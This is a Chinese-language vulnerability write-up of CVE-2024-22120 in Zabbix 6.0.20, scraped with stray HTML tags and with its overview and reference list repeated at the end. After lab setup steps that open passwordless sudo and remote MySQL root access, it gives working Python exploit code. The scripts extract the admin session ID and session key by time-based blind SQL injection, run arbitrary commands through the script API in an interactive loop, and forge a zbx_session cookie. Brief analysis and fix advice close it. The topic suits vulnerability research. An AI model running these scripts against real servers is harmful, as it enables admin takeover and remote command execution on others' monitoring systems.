CVE-2024-22120: Zabbix低权限SQL注入至RCE+权限绕过漏洞分析<\/h1>

漏洞概述<\/h2>
CVE-2024-22120是Zabbix监控系统中存在的一个严重安全漏洞，允许低权限用户通过SQL注入攻击获取管理员权限并实现远程代码执行(RCE)。该漏洞影响Zabbix 6.0.20及之前版本。<\/p>

漏洞环境搭建<\/h2>

1.1 下载和设置VMware镜像<\/h3>

下载Zabbix 6.0.20虚拟机镜像：<\/p>

https:\/\/cdn.zabbix.com\/zabbix\/appliances\/stable\/6.0\/6.0.20\/zabbix_appliance-6.0.20-vmx.tar.gz
<\/code><\/pre>
<\/li>

解压后使用VMware打开.vmx文件<\/p>

默认账号：root<\/li>
默认密码：zabbix<\/li>
<\/ul>
<\/li>

配置sudo权限：<\/p>
visudo
<\/span><\/span><\/code><\/pre>添加以下内容：<\/p>
zabbix ALL=(ALL) NOPASSWD:ALL
<\/code><\/pre>
<\/li>

配置MySQL远程访问：<\/p>
mysql -<\/span>uroot
<\/span><\/span>SET<\/span> PASSWORD =<\/span> 'zabbix'<\/span>;
<\/span><\/span>use mysql;
<\/span><\/span>select<\/span> host<\/span>, user<\/span> from<\/span> user<\/span>;
<\/span><\/span>update<\/span> user<\/span> set<\/span> host<\/span> =<\/span> '%'<\/span> where<\/span> user<\/span> =<\/span>'root'<\/span>;
<\/span><\/span>FLUSH PRIVILEGES<\/span>;
<\/span><\/span>GRANT<\/span> ALL<\/span> PRIVILEGES<\/span> ON<\/span> *<\/span>.*<\/span> TO<\/span> 'root'<\/span>@<\/span>'%'<\/span> WITH<\/span> GRANT<\/span> OPTION<\/span>;
<\/span><\/span>FLUSH PRIVILEGES<\/span>;
<\/span><\/span>exit
<\/span><\/span><\/code><\/pre><\/li>

开放防火墙端口：<\/p>
\/sbin\/iptables -I INPUT -p tcp --dport 3306<\/span> -j ACCEPT
<\/span><\/span>yum install policycoreutils -y
<\/span><\/span>service iptables save
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
1.2 漏洞环境设置<\/h3>

添加一个低权限用户：

组选择Guests<\/li>
角色选择User Role<\/li>
需要手动设置用户组为全部或Guests<\/li>
确保用户具有"Detect operating system"权限<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞复现<\/h2>
2.1 验证漏洞存在并获取管理员session id和session key<\/h3>
使用以下Python脚本进行SQL注入攻击：<\/p>
import<\/span> json
<\/span><\/span>import<\/span> argparse
<\/span><\/span>from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>from<\/span> datetime import<\/span> datetime
<\/span><\/span>
<\/span><\/span>def<\/span> send_message<\/span>(ip, port, sid, hostid, injection):
<\/span><\/span>    zbx_header =<\/span> "ZBXD<\/span>\x01<\/span>"<\/span>.<\/span>encode()
<\/span><\/span>    message =<\/span> {
<\/span><\/span>        "request"<\/span>: "command"<\/span>,
<\/span><\/span>        "sid"<\/span>: sid,
<\/span><\/span>        "scriptid"<\/span>: "3"<\/span>,
<\/span><\/span>        "clientip"<\/span>: "' + "<\/span> +<\/span> injection +<\/span> "+ '"<\/span>,
<\/span><\/span>        "hostid"<\/span>: hostid
<\/span><\/span>    }
<\/span><\/span>    message_json =<\/span> json.<\/span>dumps(message)
<\/span><\/span>    message_length =<\/span> struct.<\/span>pack('<q'<\/span>, len(message_json))
<\/span><\/span>    message =<\/span> zbx_header +<\/span> message_length +<\/span> message_json.<\/span>encode()
<\/span><\/span>    r =<\/span> remote(ip, port, level=<\/span>'debug'<\/span>)
<\/span><\/span>    r.<\/span>send(message)
<\/span><\/span>    response =<\/span> r.<\/span>recv(1024<\/span>)
<\/span><\/span>    r.<\/span>close()
<\/span><\/span>    print(response)
<\/span><\/span>
<\/span><\/span>def<\/span> extract_admin_session_id<\/span>(ip, port, sid, hostid, time_false, time_true):
<\/span><\/span>    session_id =<\/span> ""<\/span>
<\/span><\/span>    token_length =<\/span> 32<\/span>
<\/span><\/span>    for<\/span> i in<\/span> range(1<\/span>, token_length+<\/span>1<\/span>):
<\/span><\/span>        for<\/span> c in<\/span> string.<\/span>digits +<\/span> "abcdef"<\/span>:
<\/span><\/span>            print("<\/span>\n<\/span>(+) trying c=<\/span>%s<\/span>"<\/span> %<\/span> c, end=<\/span>""<\/span>, flush=<\/span>True<\/span>)
<\/span><\/span>            before_query =<\/span> datetime.<\/span>now().<\/span>timestamp()
<\/span><\/span>            query =<\/span> "(select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1 limit 1),<\/span>%d<\/span>,1))=<\/span>%d<\/span>) THEN sleep(<\/span>%d<\/span>) ELSE sleep(<\/span>%d<\/span>) END)"<\/span> %<\/span> (i, ord(c), time_true, time_false)
<\/span><\/span>            send_message(ip, port, sid, hostid, query)
<\/span><\/span>            after_query =<\/span> datetime.<\/span>now().<\/span>timestamp()
<\/span><\/span>            if<\/span> time_true ><\/span> (after_query-<\/span>before_query) ><\/span> time_false:
<\/span><\/span>                continue<\/span>
<\/span><\/span>            else<\/span>:
<\/span><\/span>                session_id +=<\/span> c
<\/span><\/span>                print("(+) session_id=<\/span>%s<\/span>"<\/span> %<\/span> session_id, end=<\/span>""<\/span>, flush=<\/span>True<\/span>)
<\/span><\/span>                break<\/span>
<\/span><\/span>    print("<\/span>\n<\/span>"<\/span>)
<\/span><\/span>    return<\/span> session_id
<\/span><\/span>
<\/span><\/span>def<\/span> extract_config_session_key<\/span>(ip, port, sid, hostid, time_false, time_true):
<\/span><\/span>    token =<\/span> ""<\/span>
<\/span><\/span>    token_length =<\/span> 32<\/span>
<\/span><\/span>    for<\/span> i in<\/span> range(1<\/span>, token_length+<\/span>1<\/span>):
<\/span><\/span>        for<\/span> c in<\/span> string.<\/span>digits +<\/span> "abcdef"<\/span>:
<\/span><\/span>            print("<\/span>\n<\/span>(+) trying c=<\/span>%s<\/span>"<\/span> %<\/span> c, end=<\/span>""<\/span>, flush=<\/span>True<\/span>)
<\/span><\/span>            before_query =<\/span> datetime.<\/span>now().<\/span>timestamp()
<\/span><\/span>            query =<\/span> "(select CASE WHEN (ascii(substr((select session_key from config),<\/span>%d<\/span>,1))=<\/span>%d<\/span>) THEN sleep(<\/span>%d<\/span>) ELSE sleep(<\/span>%d<\/span>) END)"<\/span> %<\/span> (i, ord(c), time_true, time_false)
<\/span><\/span>            send_message(ip, port, sid, hostid, query)
<\/span><\/span>            after_query =<\/span> datetime.<\/span>now().<\/span>timestamp()
<\/span><\/span>            if<\/span> time_true ><\/span> (after_query-<\/span>before_query) ><\/span> time_false:
<\/span><\/span>                continue<\/span>
<\/span><\/span>            else<\/span>:
<\/span><\/span>                token +=<\/span> c
<\/span><\/span>                print("(+) session_key=<\/span>%s<\/span>"<\/span> %<\/span> token, end=<\/span>""<\/span>, flush=<\/span>True<\/span>)
<\/span><\/span>                break<\/span>
<\/span><\/span>    print("<\/span>\n<\/span>"<\/span>)
<\/span><\/span>    return<\/span> token
<\/span><\/span><\/code><\/pre>执行命令：<\/p>
python main.py --ip [<\/span>目标IP]<\/span> --sid [<\/span>低权限用户session ID]<\/span> --hostid [<\/span>可访问的主机ID]<\/span>
<\/span><\/span><\/code><\/pre>2.2 利用获取到的管理员session id实现RCE<\/h3>
import<\/span> requests
<\/span><\/span>import<\/span> json
<\/span><\/span>
<\/span><\/span>ZABIX_ROOT =<\/span> "http:\/\/192.168.198.136"<\/span>
<\/span><\/span>url =<\/span> ZABIX_ROOT +<\/span> "\/api_jsonrpc.php"<\/span>
<\/span><\/span>host_id =<\/span> "10084"<\/span>
<\/span><\/span>session_id =<\/span> "00000000000000000000000000000000"<\/span>
<\/span><\/span>headers =<\/span> {
<\/span><\/span>    "content-type"<\/span>: "application\/json"<\/span>,
<\/span><\/span>}
<\/span><\/span>auth =<\/span> json.<\/span>loads('{"jsonrpc": "2.0", "result": "'<\/span> +<\/span> session_id +<\/span> '", "id": 0}'<\/span>)
<\/span><\/span>
<\/span><\/span>while<\/span> True<\/span>:
<\/span><\/span>    cmd =<\/span> input('<\/span>\033<\/span>[41m[zabbix_cmd]>>: <\/span>\033<\/span>[0m '<\/span>)
<\/span><\/span>    if<\/span> cmd ==<\/span> ""<\/span>:
<\/span><\/span>        print("Result of last command:"<\/span>)
<\/span><\/span>    elif<\/span> cmd ==<\/span> "quit"<\/span>:
<\/span><\/span>        break<\/span>
<\/span><\/span>    
<\/span><\/span>    payload =<\/span> {
<\/span><\/span>        "jsonrpc"<\/span>: "2.0"<\/span>,
<\/span><\/span>        "method"<\/span>: "script.update"<\/span>,
<\/span><\/span>        "params"<\/span>: {
<\/span><\/span>            "scriptid"<\/span>: "1"<\/span>,
<\/span><\/span>            "command"<\/span>: ""<\/span> +<\/span> cmd +<\/span> ""<\/span>
<\/span><\/span>        },
<\/span><\/span>        "auth"<\/span>: auth['result'<\/span>],
<\/span><\/span>        "id"<\/span>: 0<\/span>,
<\/span><\/span>    }
<\/span><\/span>    cmd_upd =<\/span> requests.<\/span>post(url, data=<\/span>json.<\/span>dumps(payload), headers=<\/span>headers)
<\/span><\/span>    
<\/span><\/span>    payload =<\/span> {
<\/span><\/span>        "jsonrpc"<\/span>: "2.0"<\/span>,
<\/span><\/span>        "method"<\/span>: "script.execute"<\/span>,
<\/span><\/span>        "params"<\/span>: {
<\/span><\/span>            "scriptid"<\/span>: "1"<\/span>,
<\/span><\/span>            "hostid"<\/span>: ""<\/span> +<\/span> host_id +<\/span> ""<\/span>
<\/span><\/span>        },
<\/span><\/span>        "auth"<\/span>: auth['result'<\/span>],
<\/span><\/span>        "id"<\/span>: 0<\/span>,
<\/span><\/span>    }
<\/span><\/span>    cmd_exe =<\/span> requests.<\/span>post(url, data=<\/span>json.<\/span>dumps(payload), headers=<\/span>headers)
<\/span><\/span>    cmd_exe_json =<\/span> cmd_exe.<\/span>json()
<\/span><\/span>    
<\/span><\/span>    if<\/span> "error"<\/span> not<\/span> in<\/span> cmd_exe.<\/span>text:
<\/span><\/span>        print(cmd_exe_json["result"<\/span>]["value"<\/span>])
<\/span><\/span>    else<\/span>:
<\/span><\/span>        print(cmd_exe_json["error"<\/span>]["data"<\/span>])
<\/span><\/span><\/code><\/pre>2.3 构造zbx_session登录管理界面<\/h3>
import<\/span> hmac
<\/span><\/span>import<\/span> json
<\/span><\/span>import<\/span> hashlib
<\/span><\/span>import<\/span> base64
<\/span><\/span>from<\/span> collections import<\/span> OrderedDict
<\/span><\/span>import<\/span> time
<\/span><\/span>
<\/span><\/span>def<\/span> GenerateAdminSession<\/span>(sessionid, session_key):
<\/span><\/span>    def<\/span> sign<\/span>(data: str) -><\/span> str:
<\/span><\/span>        key =<\/span> session_key.<\/span>encode()
<\/span><\/span>        return<\/span> hmac.<\/span>new(key, data.<\/span>encode('utf-8'<\/span>), hashlib.<\/span>sha256).<\/span>hexdigest()
<\/span><\/span>
<\/span><\/span>    def<\/span> prepare_data<\/span>(data: dict) -><\/span> str:
<\/span><\/span>        sorted_data =<\/span> OrderedDict(data.<\/span>items())
<\/span><\/span>        sorted_data['sign'<\/span>] =<\/span> sign(json.<\/span>dumps(sorted_data, separators=<\/span>(','<\/span>, ':'<\/span>)))
<\/span><\/span>        return<\/span> base64.<\/span>b64encode(json.<\/span>dumps(sorted_data, separators=<\/span>(','<\/span>, ':'<\/span>)).<\/span>encode('utf-8'<\/span>)).<\/span>decode('utf-8'<\/span>)
<\/span><\/span>
<\/span><\/span>    session =<\/span> {
<\/span><\/span>        "sessionid"<\/span>: sessionid,
<\/span><\/span>        "serverCheckResult"<\/span>: True<\/span>,
<\/span><\/span>        "serverCheckTime"<\/span>: int(time.<\/span>time())
<\/span><\/span>    }
<\/span><\/span>    res =<\/span> prepare_data(session)
<\/span><\/span>    return<\/span> res
<\/span><\/span><\/code><\/pre>漏洞分析<\/h2>
漏洞位于Zabbix的脚本执行功能中，攻击者可以通过构造特殊的clientip参数实现SQL注入。关键点在于：<\/p>

低权限用户需要具有"Detect operating system"权限<\/li>
通过时间盲注获取管理员sessionid和config表中的session_key<\/li>
利用获取的凭证构造有效的zbx_session cookie<\/li>
通过脚本更新和执行功能实现RCE<\/li>
<\/ol>
修复建议<\/h2>

升级到Zabbix最新版本<\/li>
限制低权限用户的权限，特别是"Detect operating system"权限<\/li>
对用户输入进行严格的过滤和验证<\/li>
<\/ol>
参考资源<\/h2>

漏洞报告：https:\/\/support.zabbix.com\/browse\/ZBX-24505<\/li>
完整PoC代码：https:\/\/github.com\/W01fh4cker\/CVE-2024-22120-RCE<\/li>
详细代码分析：https:\/\/mp.weixin.qq.com\/s\/qUr58Dez4lnlaTyg2BilUg<\/li>
<\/ol>

CVE-2024-22120: Zabbix低权限SQL注入至RCE+权限绕过漏洞分析<\/h1>

漏洞概述<\/h2> CVE-2024-22120是Zabbix监控系统中存在的一个严重安全漏洞，允许低权限用户通过SQL注入攻击获取管理员权限并实现远程代码执行(RCE)。该漏洞影响Zabbix 6.0.20及之前版本。<\/p>

漏洞环境搭建<\/h2>

漏洞复现<\/h2>

参考资源<\/h2> 漏洞报告：https:\/\/support.zabbix.com\/browse\/ZBX-24505<\/li> 完整PoC代码：https:\/\/github.com\/W01fh4cker\/CVE-2024-22120-RCE<\/li> 详细代码分析：https:\/\/mp.weixin.qq.com\/s\/qUr58Dez4lnlaTyg2BilUg<\/li> <\/ol>

漏洞概述<\/h2>
CVE-2024-22120是Zabbix监控系统中存在的一个严重安全漏洞，允许低权限用户通过SQL注入攻击获取管理员权限并实现远程代码执行(RCE)。该漏洞影响Zabbix 6.0.20及之前版本。<\/p>

参考资源<\/h2>

漏洞报告：https:\/\/support.zabbix.com\/browse\/ZBX-24505<\/li>
完整PoC代码：https:\/\/github.com\/W01fh4cker\/CVE-2024-22120-RCE<\/li>
详细代码分析：https:\/\/mp.weixin.qq.com\/s\/qUr58Dez4lnlaTyg2BilUg<\/li> <\/ol>